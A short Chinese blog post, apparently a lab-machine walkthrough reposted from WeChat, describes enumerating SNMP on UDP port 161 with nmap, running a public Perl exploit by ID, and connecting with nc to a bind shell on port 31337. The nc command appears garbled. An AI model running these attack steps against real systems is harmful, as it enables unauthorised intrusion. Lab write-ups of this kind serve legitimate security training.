SNMP服务泄露信息突破边界

admin 2024年9月14日18:27:39评论21 views字数 262阅读0分52秒阅读模式

snmp服务

01

信息泄露

靶机的时候扫端口要注意UDP的端口,这次打靶机的时候,扫描UDP端口发现了161开了snmp服务:

nmap -sU --top-ports 100 $IP

SNMP服务泄露信息突破边界

继续扫描漏洞:

nmap -sU -p161 --script *snmp* $IP

SNMP服务泄露信息突破边界

发现了一堆进程的信息,在3778进程上面看到了一个服务的名字,搜一下EXP,直接攻击就成功拿下靶机了:

SNMP服务泄露信息突破边界

perl 4761.pl $IP

SNMP服务泄露信息突破边界

nc监听靶机31337端口:

nc -nv $IP 31337/bin/bash -ip

SNMP服务泄露信息突破边界

原文始发于微信公众号(道玄网安驿站):SNMP服务泄露信息突破边界

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月14日18:27:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SNMP服务泄露信息突破边界http://cn-sec.com/archives/3168653.html

发表评论

匿名网友 填写信息